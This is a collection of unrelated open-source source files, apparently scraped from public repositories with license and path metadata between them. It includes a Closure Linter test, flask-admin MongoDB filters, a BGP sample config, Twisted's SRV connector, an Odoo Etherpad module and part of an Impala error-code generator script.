print "Path : %s" % projects[project][0]
if dep_list:
for dep in dep_list:
print " - %s" % dep
print ""
print "-- --"
def PrintBuildOrder(projects, deps):
print "---------------------------------------"
print "Build order "
print "---------------------------------------"
print "-- --"
built = []
for (project, _) in sorted(deps.items()):
if project not in built:
BuildProject(project, built, projects, deps)
print "-- --"
def PrintVCProj(projects):
for project in projects:
print "-------------------------------------"
print "-------------------------------------"
print project
print project
print project
print "-------------------------------------"
print "-------------------------------------"
project_path = os.path.abspath(os.path.join(os.path.dirname(sys.argv[1]),
projects[project][2]))
pretty = pretty_vcproj
argv = [ '',
project_path,
'$(SolutionDir)=%s\\' % os.path.dirname(sys.argv[1]),
]
argv.extend(sys.argv[3:])
pretty.main(argv)
def main():
# check if we have exactly 1 parameter.
if len(sys.argv) < 2:
print 'Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0]
return 1
(projects, deps) = ParseSolution(sys.argv[1])
PrintDependencies(projects, deps)
PrintBuildOrder(projects, deps)
if '--recursive' in sys.argv:
PrintVCProj(projects)
return 0
if __name__ == '__main__':
sys.exit(main())
| apache-2.0 |
Bysmyyr/chromium-crosswalk | third_party/closure_linter/closure_linter/javascriptstatetracker_test.py | 127 | 7517 | #!/usr/bin/env python
#
# Copyright 2012 The Closure Linter Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for the javascriptstatetracker module."""
# Allow non-Google copyright
# pylint: disable=g-bad-file-header
__author__ = ('nnaze@google.com (Nathan Naze)')
import unittest as googletest
from closure_linter import javascripttokens
from closure_linter import testutil
from closure_linter import tokenutil
_FUNCTION_SCRIPT = """\
var a = 3;
function foo(aaa, bbb, ccc) {
var b = 4;
}
/**
* JSDoc comment.
*/
var bar = function(ddd, eee, fff) {
};
/**
* Verify that nested functions get their proper parameters recorded.
*/
var baz = function(ggg, hhh, iii) {
var qux = function(jjj, kkk, lll) {
};
// make sure that entering a new block does not change baz' parameters.
{};
};
"""
class FunctionTest(googletest.TestCase):
def testFunctionParse(self):
functions, _ = testutil.ParseFunctionsAndComments(_FUNCTION_SCRIPT)
self.assertEquals(4, len(functions))
# First function
function = functions[0]
self.assertEquals(['aaa', 'bbb', 'ccc'], function.parameters)
start_token = function.start_token
end_token = function.end_token
self.assertEquals(
javascripttokens.JavaScriptTokenType.FUNCTION_DECLARATION,
function.start_token.type)
self.assertEquals('function', start_token.string)
self.assertEquals(3, start_token.line_number)
self.assertEquals(0, start_token.start_index)
self.assertEquals('}', end_token.string)
self.assertEquals(5, end_token.line_number)
self.assertEquals(0, end_token.start_index)
self.assertEquals('foo', function.name)
self.assertIsNone(function.doc)
# Second function
function = functions[1]
self.assertEquals(['ddd', 'eee', 'fff'], function.parameters)
start_token = function.start_token
end_token = function.end_token
self.assertEquals(
javascripttokens.JavaScriptTokenType.FUNCTION_DECLARATION,
function.start_token.type)
self.assertEquals('function', start_token.string)
self.assertEquals(11, start_token.line_number)
self.assertEquals(10, start_token.start_index)
self.assertEquals('}', end_token.string)
self.assertEquals(13, end_token.line_number)
self.assertEquals(0, end_token.start_index)
self.assertEquals('bar', function.name)
self.assertIsNotNone(function.doc)
# Check function JSDoc
doc = function.doc
doc_tokens = tokenutil.GetTokenRange(doc.start_token, doc.end_token)
comment_type = javascripttokens.JavaScriptTokenType.COMMENT
comment_tokens = filter(lambda t: t.type is comment_type, doc_tokens)
self.assertEquals('JSDoc comment.',
tokenutil.TokensToString(comment_tokens).strip())
# Third function
function = functions[2]
self.assertEquals(['ggg', 'hhh', 'iii'], function.parameters)
start_token = function.start_token
end_token = function.end_token
self.assertEquals(
javascripttokens.JavaScriptTokenType.FUNCTION_DECLARATION,
function.start_token.type)
self.assertEquals('function', start_token.string)
self.assertEquals(19, start_token.line_number)
self.assertEquals(10, start_token.start_index)
self.assertEquals('}', end_token.string)
self.assertEquals(24, end_token.line_number)
self.assertEquals(0, end_token.start_index)
self.assertEquals('baz', function.name)
self.assertIsNotNone(function.doc)
# Fourth function (inside third function)
function = functions[3]
self.assertEquals(['jjj', 'kkk', 'lll'], function.parameters)
start_token = function.start_token
end_token = function.end_token
self.assertEquals(
javascripttokens.JavaScriptTokenType.FUNCTION_DECLARATION,
function.start_token.type)
self.assertEquals('function', start_token.string)
self.assertEquals(20, start_token.line_number)
self.assertEquals(12, start_token.start_index)
self.assertEquals('}', end_token.string)
self.assertEquals(21, end_token.line_number)
self.assertEquals(2, end_token.start_index)
self.assertEquals('qux', function.name)
self.assertIsNone(function.doc)
class CommentTest(googletest.TestCase):
def testGetDescription(self):
comment = self._ParseComment("""
/**
* Comment targeting goog.foo.
*
* This is the second line.
* @param {number} foo The count of foo.
*/
target;""")
self.assertEqual(
'Comment targeting goog.foo.\n\nThis is the second line.',
comment.description)
def testCommentGetTarget(self):
self.assertCommentTarget('goog.foo', """
/**
* Comment targeting goog.foo.
*/
goog.foo = 6;
""")
self.assertCommentTarget('bar', """
/**
* Comment targeting bar.
*/
var bar = "Karate!";
""")
self.assertCommentTarget('doThing', """
/**
* Comment targeting doThing.
*/
function doThing() {};
""")
self.assertCommentTarget('this.targetProperty', """
goog.bar.Baz = function() {
/**
* Comment targeting targetProperty.
*/
this.targetProperty = 3;
};
""")
self.assertCommentTarget('goog.bar.prop', """
/**
* Comment targeting goog.bar.prop.
*/
goog.bar.prop;
""")
self.assertCommentTarget('goog.aaa.bbb', """
/**
* Comment targeting goog.aaa.bbb.
*/
(goog.aaa.bbb)
""")
self.assertCommentTarget('theTarget', """
/**
* Comment targeting symbol preceded by newlines, whitespace,
* and parens -- things we ignore.
*/
(theTarget)
""")
self.assertCommentTarget(None, """
/**
* @fileoverview File overview.
*/
(notATarget)
""")
self.assertCommentTarget(None, """
/**
* Comment that doesn't find a target.
*/
""")
self.assertCommentTarget('theTarget.is.split.across.lines', """
/**
* Comment that addresses a symbol split across lines.
*/
(theTarget.is.split
.across.lines)
""")
self.assertCommentTarget('theTarget.is.split.across.lines', """
/**
* Comment that addresses a symbol split across lines.
*/
(theTarget.is.split.
across.lines)
""")
def _ParseComment(self, script):
"""Parse a script that contains one comment and return it."""
_, comments = testutil.ParseFunctionsAndComments(script)
self.assertEquals(1, len(comments))
return comments[0]
def assertCommentTarget(self, target, script):
comment = self._ParseComment(script)
self.assertEquals(target, comment.GetTargetIdentifier())
if __name__ == '__main__':
googletest.main()
| bsd-3-clause |
kohnle-lernmodule/KITexe201based | exe/engine/version.py | 2 | 2041 | #!/usr/bin/python
# ===========================================================================
# eXe
# Copyright 2004-2006 University of Auckland
# Copyright 2004-2008 eXe Project, http://eXeLearning.org/
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# ===========================================================================
"""
Version Information
"""
project = "KIC.InnoEnergy"
release = "2.0.1"
revisionIntef = "dd27f4d"
revisionLernmodule = "KIC-2"
revision = revisionIntef+"-"+revisionLernmodule
version = release
pkg_version = None
#try:
# line = open('debian/changelog').readline()
# release = line.split(':')[1].split(')')[0]
#except:
# try:
# import pkg_resources
# pkg_version = pkg_resources.require(project)[0].version
# release = pkg_version[0:-42]
# except:
# import sys
# if sys.platform[:3] == "win":
# pkg_version = open(sys.prefix + '/version').readline()
# release = pkg_version[0:-42]
# else:
# pkg_version = open('../Resources/exe/version').readline()
# release = pkg_version[0:-42]
#try:
# import git
#
# repo = git.Repo()
# revision = repo.head.commit.hexsha
#except:
# revision = pkg_version[-40:] if pkg_version else ''
#version = release + "-r" + revision if revision else release
if __name__ == '__main__':
print project, version
| gpl-2.0 |
ibushong/test-repo | flask_admin/contrib/pymongo/filters.py | 7 | 2535 | import re
from flask.ext.admin.babel import gettext
from flask.ext.admin.model import filters
from .tools import parse_like_term
class BasePyMongoFilter(filters.BaseFilter):
"""
Base pymongo filter.
"""
def __init__(self, column, name, options=None, data_type=None):
"""
Constructor.
:param column:
Document field name
:param name:
Display name
:param options:
Fixed set of options
:param data_type:
Client data type
"""
super(BasePyMongoFilter, self).__init__(name, options, data_type)
self.column = column
# Common filters
class FilterEqual(BasePyMongoFilter):
def apply(self, query, value):
query.append({self.column: value})
return query
def operation(self):
return gettext('equals')
class FilterNotEqual(BasePyMongoFilter):
def apply(self, query, value):
query.append({self.column: {'$ne': value}})
return query
def operation(self):
return gettext('not equal')
class FilterLike(BasePyMongoFilter):
def apply(self, query, value):
regex = parse_like_term(value)
query.append({self.column: {'$regex': regex}})
return query
def operation(self):
return gettext('contains')
class FilterNotLike(BasePyMongoFilter):
def apply(self, query, value):
regex = parse_like_term(value)
query.append({self.column: {'$not': re.compile(regex)}})
return query
def operation(self):
return gettext('not contains')
class FilterGreater(BasePyMongoFilter):
def apply(self, query, value):
try:
value = float(value)
except ValueError:
value = 0
query.append({self.column: {'$gt': value}})
return query
def operation(self):
return gettext('greater than')
class FilterSmaller(BasePyMongoFilter):
def apply(self, query, value):
try:
value = float(value)
except ValueError:
value = 0
query.append({self.column: {'$lt': value}})
return query
def operation(self):
return gettext('smaller than')
# Customized type filters
class BooleanEqualFilter(FilterEqual, filters.BaseBooleanFilter):
def clean(self, value):
return value == '1'
class BooleanNotEqualFilter(FilterNotEqual, filters.BaseBooleanFilter):
def clean(self, value):
return value == '1'
| bsd-3-clause |
ariloulaleelay/wrflow | wrflow/model/dag.py | 1 | 4111 | from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, DateTime, Integer, Boolean
from sqlalchemy import orm
from json import loads as json_loads
from json import dumps as json_dumps
from wrflow.common import hash_dict, hash_list
Base = declarative_base()
__all__ = [
'Node',
'Edge',
]
class Node(Base):
__tablename__ = 'nodes'
id = Column(String, primary_key=True)
params_string = Column(String, nullable=False)
demand = Column(Integer, nullable=False)
satisfied = Column(Boolean, nullable=False)
edges = orm.relationship("Edge")
last_occurence = Column(DateTime, nullable=True)
def __init__(self, params, demand=0, satisfied=False):
self.id = hash_dict(params)
self.params = params
self.params_string = json_dumps(self.params)
self.demand = demand
self.satisfied = satisfied
self.last_occurence = None
@classmethod
def get_or_create(cls, params, session=None):
if session is None:
session = cls
id = hash_dict(params)
instance = session.query(cls).filter(cls.id == id).first()
if instance:
return instance, False
instance = Node(params)
session.add(instance)
return instance, True
@orm.reconstructor
def __init_reconstruct(self):
self.params = json_loads(self.params_string)
def is_sub_of(self, node):
for k, v in node.params.iteritems():
if self.params.get(k, None) != v:
return False
return True
def occured(self):
return self.last_occurence is not None
def satisfy(self, session):
self.satisfied = True
nodes = session.query(Node).filter(~Node.satisfied)
for node in nodes:
if self.is_sub_of(node):
node.satisfied = True
def add_demand(self, demand, session):
seen_nodes = set()
nodes = set()
nodes.add(self)
while len(nodes) > 0:
node = nodes.pop()
node.demand += demand
seen_nodes.add(node)
for edge in node.edges:
for subnode in edge.nodes:
if subnode in seen_nodes:
continue
if subnode.satisfied:
continue
nodes.add(subnode)
for node in seen_nodes:
node.save()
def __eq__(self, that):
return self.id == that.id
def __hash__(self):
return hash(self.id)
class Edge(Base):
__tablename__ = 'edges'
id = Column(String, primary_key=True)
task_class_string = Column(String, nullable=False)
nodes = orm.relationship("Node")
def __init__(self, task_class, nodes):
self.task_class = task_class
self.task_class_string = self.task_class.__module__ + '.' + self.task_class.__name__
self.id = self._generate_id(task_class, nodes)
for node in nodes:
self.nodes.append(node)
@orm.reconstructor
def __init_reconstruct(self):
module_name, class_name = self.task_class_string.rsplit('.', 1)
module = __import__(module_name, fromlist=[class_name])
self.task_class = getattr(module, class_name)
@classmethod
def _generate_id(cls, task_class, nodes):
task_class_string = task_class.__module__ + '.' + task_class.__name__
id = task_class_string + ':' + hash_list(sorted(map(lambda x: x.id, nodes)))
return id
def __eq__(self, that):
return self.id == that.id
@classmethod
def get_or_create(cls, task_class, nodes, session):
id = cls._generate_id(task_class, nodes)
instance = session.query(cls).filter(cls.id == id).first()
if instance:
return instance, False
instance = cls(task_class, nodes)
session.add(instance)
return instance, True
@property
def satisfied(self):
for node in self.nodes:
if not node.satisfied:
return False
return True
| gpl-2.0 |
ntts-clo/mld-ryu | ryu/services/protocols/bgp/bgp_sample_conf.py | 3 | 3176 | import os
# =============================================================================
# BGP configuration.
# =============================================================================
BGP = {
# General BGP configuration.
'routing': {
# ASN for this BGP instance.
'local_as': 64512,
# BGP Router ID.
'router_id': '10.10.0.1',
# We list all BGP neighbors below. We establish EBGP sessions with peer
# with different AS number then configured above. We will
# establish IBGP session if AS number is same.
'bgp_neighbors': {
'10.0.0.1': {
'remote_as': 64513,
'multi_exit_disc': 100
},
'10.10.0.2': {
'remote_as': 64514,
},
},
'networks': [
'10.20.0.0/24',
'10.30.0.0/24',
'10.40.0.0/16',
'10.50.0.0/16',
],
},
}
# =============================================================================
# Logging configuration.
# =============================================================================
LOGGING = {
# We use python logging package for logging.
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s ' +
'[%(process)d %(thread)d] %(message)s'
},
'simple': {
'format': '%(levelname)s %(asctime)s %(module)s %(lineno)s ' +
'%(message)s'
},
'stats': {
'format': '%(message)s'
},
},
'handlers': {
# Outputs log to console.
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'console_stats': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'stats'
},
# Rotates log file when its size reaches 10MB.
'log_file': {
'level': 'ERROR',
'class': 'logging.handlers.RotatingFileHandler',
'filename': os.path.join('.', 'bgpspeaker.log'),
'maxBytes': '10000000',
'formatter': 'verbose'
},
'stats_file': {
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'filename': os.path.join('.', 'statistics_bgps.log'),
'maxBytes': '10000000',
'formatter': 'stats'
},
},
# Fine-grained control of logging per instance.
'loggers': {
'bgpspeaker': {
'handlers': ['console', 'log_file'],
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
'stats': {
'handlers': ['stats_file', 'console_stats'],
'level': 'INFO',
'propagate': False,
'formatter': 'stats',
},
},
# Root loggers.
'root': {
'handlers': ['console', 'log_file'],
'level': 'DEBUG',
'propagate': True,
},
}
| apache-2.0 |
evensonbryan/yocto-autobuilder | lib/python2.7/site-packages/Twisted-12.2.0-py2.7-linux-x86_64.egg/twisted/names/srvconnect.py | 7 | 7383 | # -*- test-case-name: twisted.names.test.test_srvconnect -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
import random
from zope.interface import implements
from twisted.internet import error, interfaces
from twisted.names import client, dns
from twisted.names.error import DNSNameError
from twisted.python.compat import reduce
class _SRVConnector_ClientFactoryWrapper:
def __init__(self, connector, wrappedFactory):
self.__connector = connector
self.__wrappedFactory = wrappedFactory
def startedConnecting(self, connector):
self.__wrappedFactory.startedConnecting(self.__connector)
def clientConnectionFailed(self, connector, reason):
self.__connector.connectionFailed(reason)
def clientConnectionLost(self, connector, reason):
self.__connector.connectionLost(reason)
def __getattr__(self, key):
return getattr(self.__wrappedFactory, key)
class SRVConnector:
"""A connector that looks up DNS SRV records. See RFC2782."""
implements(interfaces.IConnector)
stopAfterDNS=0
def __init__(self, reactor, service, domain, factory,
protocol='tcp', connectFuncName='connectTCP',
connectFuncArgs=(),
connectFuncKwArgs={},
defaultPort=None,
):
"""
@ivar defaultPort: Optional default port number to be used when SRV
lookup fails and the service name is unknown. This should be the
port number associated with the service name as defined by the IANA
registry.
@type defaultPort: C{int}
"""
self.reactor = reactor
self.service = service
self.domain = domain
self.factory = factory
self.protocol = protocol
self.connectFuncName = connectFuncName
self.connectFuncArgs = connectFuncArgs
self.connectFuncKwArgs = connectFuncKwArgs
self._defaultPort = defaultPort
self.connector = None
self.servers = None
self.orderedServers = None # list of servers already used in this round
def connect(self):
"""Start connection to remote server."""
self.factory.doStart()
self.factory.startedConnecting(self)
if not self.servers:
if self.domain is None:
self.connectionFailed(error.DNSLookupError("Domain is not defined."))
return
d = client.lookupService('_%s._%s.%s' % (self.service,
self.protocol,
self.domain))
d.addCallbacks(self._cbGotServers, self._ebGotServers)
d.addCallback(lambda x, self=self: self._reallyConnect())
if self._defaultPort:
d.addErrback(self._ebServiceUnknown)
d.addErrback(self.connectionFailed)
elif self.connector is None:
self._reallyConnect()
else:
self.connector.connect()
def _ebGotServers(self, failure):
failure.trap(DNSNameError)
# Some DNS servers reply with NXDOMAIN when in fact there are
# just no SRV records for that domain. Act as if we just got an
# empty response and use fallback.
self.servers = []
self.orderedServers = []
def _cbGotServers(self, (answers, auth, add)):
if len(answers) == 1 and answers[0].type == dns.SRV \
and answers[0].payload \
and answers[0].payload.target == dns.Name('.'):
# decidedly not available
raise error.DNSLookupError("Service %s not available for domain %s."
% (repr(self.service), repr(self.domain)))
self.servers = []
self.orderedServers = []
for a in answers:
if a.type != dns.SRV or not a.payload:
continue
self.orderedServers.append((a.payload.priority, a.payload.weight,
str(a.payload.target), a.payload.port))
def _ebServiceUnknown(self, failure):
"""
Connect to the default port when the service name is unknown.
If no SRV records were found, the service name will be passed as the
port. If resolving the name fails with
L{error.ServiceNameUnknownError}, a final attempt is done using the
default port.
"""
failure.trap(error.ServiceNameUnknownError)
self.servers = [(0, 0, self.domain, self._defaultPort)]
self.orderedServers = []
self.connect()
def _serverCmp(self, a, b):
if a[0]!=b[0]:
return cmp(a[0], b[0])
else:
return cmp(a[1], b[1])
def pickServer(self):
assert self.servers is not None
assert self.orderedServers is not None
if not self.servers and not self.orderedServers:
# no SRV record, fall back..
return self.domain, self.service
if not self.servers and self.orderedServers:
# start new round
self.servers = self.orderedServers
self.orderedServers = []
assert self.servers
self.servers.sort(self._serverCmp)
minPriority=self.servers[0][0]
weightIndex = zip(xrange(len(self.servers)), [x[1] for x in self.servers
if x[0]==minPriority])
weightSum = reduce(lambda x, y: (None, x[1]+y[1]), weightIndex, (None, 0))[1]
rand = random.randint(0, weightSum)
for index, weight in weightIndex:
weightSum -= weight
if weightSum <= 0:
chosen = self.servers[index]
del self.servers[index]
self.orderedServers.append(chosen)
p, w, host, port = chosen
return host, port
raise RuntimeError, 'Impossible %s pickServer result.' % self.__class__.__name__
def _reallyConnect(self):
if self.stopAfterDNS:
self.stopAfterDNS=0
return
self.host, self.port = self.pickServer()
assert self.host is not None, 'Must have a host to connect to.'
assert self.port is not None, 'Must have a port to connect to.'
connectFunc = getattr(self.reactor, self.connectFuncName)
self.connector=connectFunc(
self.host, self.port,
_SRVConnector_ClientFactoryWrapper(self, self.factory),
*self.connectFuncArgs, **self.connectFuncKwArgs)
def stopConnecting(self):
"""Stop attempting to connect."""
if self.connector:
self.connector.stopConnecting()
else:
self.stopAfterDNS=1
def disconnect(self):
"""Disconnect whatever our are state is."""
if self.connector is not None:
self.connector.disconnect()
else:
self.stopConnecting()
def getDestination(self):
assert self.connector
return self.connector.getDestination()
def connectionFailed(self, reason):
self.factory.clientConnectionFailed(self, reason)
self.factory.doStop()
def connectionLost(self, reason):
self.factory.clientConnectionLost(self, reason)
self.factory.doStop()
| gpl-2.0 |
oihane/odoo | addons/pad/pad.py | 84 | 4296 | # -*- coding: utf-8 -*-
from openerp.osv import fields, osv
import random
import re
import string
import urllib2
import logging
from openerp import SUPERUSER_ID
from openerp.tools.translate import _
from openerp.tools import html2plaintext
from py_etherpad import EtherpadLiteClient
_logger = logging.getLogger(__name__)
class pad_common(osv.osv_memory):
_name = 'pad.common'
def pad_is_configured(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
return bool(user.company_id.pad_server)
def pad_generate_url(self, cr, uid, context=None):
company = self.pool.get('res.users').browse(cr, SUPERUSER_ID, uid, context=context).company_id
pad = {
"server" : company.pad_server,
"key" : company.pad_key,
}
# make sure pad server in the form of http://hostname
if not pad["server"]:
return pad
if not pad["server"].startswith('http'):
pad["server"] = 'http://' + pad["server"]
pad["server"] = pad["server"].rstrip('/')
# generate a salt
s = string.ascii_uppercase + string.digits
salt = ''.join([s[random.randint(0, len(s) - 1)] for i in range(10)])
#path
# etherpad hardcodes pad id length limit to 50
path = '-%s-%s' % (self._name, salt)
path = '%s%s' % (cr.dbname.replace('_','-')[0:50 - len(path)], path)
# contruct the url
url = '%s/p/%s' % (pad["server"], path)
#if create with content
if "field_name" in context and "model" in context and "object_id" in context:
myPad = EtherpadLiteClient( pad["key"], pad["server"]+'/api')
try:
myPad.createPad(path)
except urllib2.URLError:
raise osv.except_osv(_("Error"), _("Pad creation failed, \
either there is a problem with your pad server URL or with your connection."))
#get attr on the field model
model = self.pool[context["model"]]
field = model._fields[context['field_name']]
real_field = field.pad_content_field
#get content of the real field
for record in model.browse(cr, uid, [context["object_id"]]):
if record[real_field]:
myPad.setText(path, (html2plaintext(record[real_field]).encode('utf-8')))
#Etherpad for html not functional
#myPad.setHTML(path, record[real_field])
return {
"server": pad["server"],
"path": path,
"url": url,
}
def pad_get_content(self, cr, uid, url, context=None):
content = ''
if url:
try:
page = urllib2.urlopen('%s/export/html'%url).read()
mo = re.search('<body>(.*)</body>',page)
if mo:
content = mo.group(1)
except:
_logger.warning("No url found '%s'.", url)
return content
# TODO
# reverse engineer protocol to be setHtml without using the api key
def write(self, cr, uid, ids, vals, context=None):
self._set_pad_value(cr, uid, vals, context)
return super(pad_common, self).write(cr, uid, ids, vals, context=context)
def create(self, cr, uid, vals, context=None):
self._set_pad_value(cr, uid, vals, context)
return super(pad_common, self).create(cr, uid, vals, context=context)
# Set the pad content in vals
def _set_pad_value(self, cr, uid, vals, context=None):
for k,v in vals.items():
field = self._fields[k]
if hasattr(field,'pad_content_field'):
vals[field.pad_content_field] = self.pad_get_content(cr, uid, v, context=context)
def copy(self, cr, uid, id, default=None, context=None):
if not default:
default = {}
for k, field in self._fields.iteritems():
if hasattr(field,'pad_content_field'):
pad = self.pad_generate_url(cr, uid, context)
default[k] = pad.get('url')
return super(pad_common, self).copy(cr, uid, id, default, context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
pcmoritz/arrow | cpp/src/arrow/dbi/hiveserver2/thrift/generate_error_codes.py | 12 | 11132 | #!/usr/bin/env python
# Copyright 2015 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
# For readability purposes we define the error codes and messages at the top of the
# file. New codes and messages must be added here. Old error messages MUST NEVER BE
# DELETED, but can be renamed. The tuple layout for a new entry is: error code enum name,
# numeric error code, format string of the message.
#
# TODO Add support for SQL Error Codes
# https://msdn.microsoft.com/en-us/library/ms714687%28v=vs.85%29.aspx
error_codes = (
("OK", 0, ""),
("UNUSED", 1, "<UNUSED>"),
("GENERAL", 2, "$0"),
("CANCELLED", 3, "$0"),
("ANALYSIS_ERROR", 4, "$0"),
("NOT_IMPLEMENTED_ERROR", 5, "$0"),
("RUNTIME_ERROR", 6, "$0"),
("MEM_LIMIT_EXCEEDED", 7, "$0"),
("INTERNAL_ERROR", 8, "$0"),
("RECOVERABLE_ERROR", 9, "$0"),
("PARQUET_MULTIPLE_BLOCKS", 10,
"Parquet files should not be split into multiple hdfs-blocks. file=$0"),
("PARQUET_COLUMN_METADATA_INVALID", 11,
"Column metadata states there are $0 values, but read $1 values from column $2. "
"file=$3"),
("PARQUET_HEADER_PAGE_SIZE_EXCEEDED", 12, "(unused)"),
("PARQUET_HEADER_EOF", 13,
"ParquetScanner: reached EOF while deserializing data page header. file=$0"),
("PARQUET_GROUP_ROW_COUNT_ERROR", 14,
"Metadata states that in group $0($1) there are $2 rows, but $3 rows were read."),
("PARQUET_GROUP_ROW_COUNT_OVERFLOW", 15, "(unused)"),
("PARQUET_MISSING_PRECISION", 16,
"File '$0' column '$1' does not have the decimal precision set."),
("PARQUET_WRONG_PRECISION", 17,
"File '$0' column '$1' has a precision that does not match the table metadata "
" precision. File metadata precision: $2, table metadata precision: $3."),
("PARQUET_BAD_CONVERTED_TYPE", 18,
"File '$0' column '$1' does not have converted type set to DECIMAL"),
("PARQUET_INCOMPATIBLE_DECIMAL", 19,
"File '$0' column '$1' contains decimal data but the table metadata has type $2"),
("SEQUENCE_SCANNER_PARSE_ERROR", 20,
"Problem parsing file $0 at $1$2"),
("SNAPPY_DECOMPRESS_INVALID_BLOCK_SIZE", 21,
"Decompressor: block size is too big. Data is likely corrupt. Size: $0"),
("SNAPPY_DECOMPRESS_INVALID_COMPRESSED_LENGTH", 22,
"Decompressor: invalid compressed length. Data is likely corrupt."),
("SNAPPY_DECOMPRESS_UNCOMPRESSED_LENGTH_FAILED", 23,
"Snappy: GetUncompressedLength failed"),
("SNAPPY_DECOMPRESS_RAW_UNCOMPRESS_FAILED", 24,
"SnappyBlock: RawUncompress failed"),
("SNAPPY_DECOMPRESS_DECOMPRESS_SIZE_INCORRECT", 25,
"Snappy: Decompressed size is not correct."),
("HDFS_SCAN_NODE_UNKNOWN_DISK", 26, "Unknown disk id. "
"This will negatively affect performance. "
"Check your hdfs settings to enable block location metadata."),
("FRAGMENT_EXECUTOR", 27, "Reserved resource size ($0) is larger than "
"query mem limit ($1), and will be restricted to $1. Configure the reservation "
"size by setting RM_INITIAL_MEM."),
("PARTITIONED_HASH_JOIN_MAX_PARTITION_DEPTH", 28,
"Cannot perform join at hash join node with id $0."
" The input data was partitioned the maximum number of $1 times."
" This could mean there is significant skew in the data or the memory limit is"
" set too low."),
("PARTITIONED_AGG_MAX_PARTITION_DEPTH", 29,
"Cannot perform aggregation at hash aggregation node with id $0."
" The input data was partitioned the maximum number of $1 times."
" This could mean there is significant skew in the data or the memory limit is"
" set too low."),
("MISSING_BUILTIN", 30, "Builtin '$0' with symbol '$1' does not exist. "
"Verify that all your impalads are the same version."),
("RPC_GENERAL_ERROR", 31, "RPC Error: $0"),
("RPC_TIMEOUT", 32, "RPC timed out"),
("UDF_VERIFY_FAILED", 33,
"Failed to verify function $0 from LLVM module $1, see log for more details."),
("PARQUET_CORRUPT_VALUE", 34, "File $0 corrupt. RLE level data bytes = $1"),
("AVRO_DECIMAL_RESOLUTION_ERROR", 35, "Column '$0' has conflicting Avro decimal types. "
"Table schema $1: $2, file schema $1: $3"),
("AVRO_DECIMAL_METADATA_MISMATCH", 36, "Column '$0' has conflicting Avro decimal types. "
"Declared $1: $2, $1 in table's Avro schema: $3"),
("AVRO_SCHEMA_RESOLUTION_ERROR", 37, "Unresolvable types for column '$0': "
"table type: $1, file type: $2"),
("AVRO_SCHEMA_METADATA_MISMATCH", 38, "Unresolvable types for column '$0': "
"declared column type: $1, table's Avro schema type: $2"),
("AVRO_UNSUPPORTED_DEFAULT_VALUE", 39, "Field $0 is missing from file and default "
"values of type $1 are not yet supported."),
("AVRO_MISSING_FIELD", 40, "Inconsistent table metadata. Mismatch between column "
"definition and Avro schema: cannot read field $0 because there are only $1 fields."),
("AVRO_MISSING_DEFAULT", 41,
"Field $0 is missing from file and does not have a default value."),
("AVRO_NULLABILITY_MISMATCH", 42,
"Field $0 is nullable in the file schema but not the table schema."),
("AVRO_NOT_A_RECORD", 43,
"Inconsistent table metadata. Field $0 is not a record in the Avro schema."),
("PARQUET_DEF_LEVEL_ERROR", 44, "Could not read definition level, even though metadata"
" states there are $0 values remaining in data page. file=$1"),
("PARQUET_NUM_COL_VALS_ERROR", 45, "Mismatched number of values in column index $0 "
"($1 vs. $2). file=$3"),
("PARQUET_DICT_DECODE_FAILURE", 46, "Failed to decode dictionary-encoded value. "
"file=$0"),
("SSL_PASSWORD_CMD_FAILED", 47,
"SSL private-key password command ('$0') failed with error: $1"),
("SSL_CERTIFICATE_PATH_BLANK", 48, "The SSL certificate path is blank"),
("SSL_PRIVATE_KEY_PATH_BLANK", 49, "The SSL private key path is blank"),
("SSL_CERTIFICATE_NOT_FOUND", 50, "The SSL certificate file does not exist at path $0"),
("SSL_PRIVATE_KEY_NOT_FOUND", 51, "The SSL private key file does not exist at path $0"),
("SSL_SOCKET_CREATION_FAILED", 52, "SSL socket creation failed: $0"),
("MEM_ALLOC_FAILED", 53, "Memory allocation of $0 bytes failed"),
("PARQUET_REP_LEVEL_ERROR", 54, "Could not read repetition level, even though metadata"
" states there are $0 values remaining in data page. file=$1"),
("PARQUET_UNRECOGNIZED_SCHEMA", 55, "File '$0' has an incompatible Parquet schema for "
"column '$1'. Column type: $2, Parquet schema:\\n$3"),
("COLLECTION_ALLOC_FAILED", 56, "Failed to allocate buffer for collection '$0'."),
("TMP_DEVICE_BLACKLISTED", 57,
"Temporary device for directory $0 is blacklisted from a previous error and cannot "
"be used."),
("TMP_FILE_BLACKLISTED", 58,
"Temporary file $0 is blacklisted from a previous error and cannot be expanded."),
("RPC_CLIENT_CONNECT_FAILURE", 59,
"RPC client failed to connect: $0"),
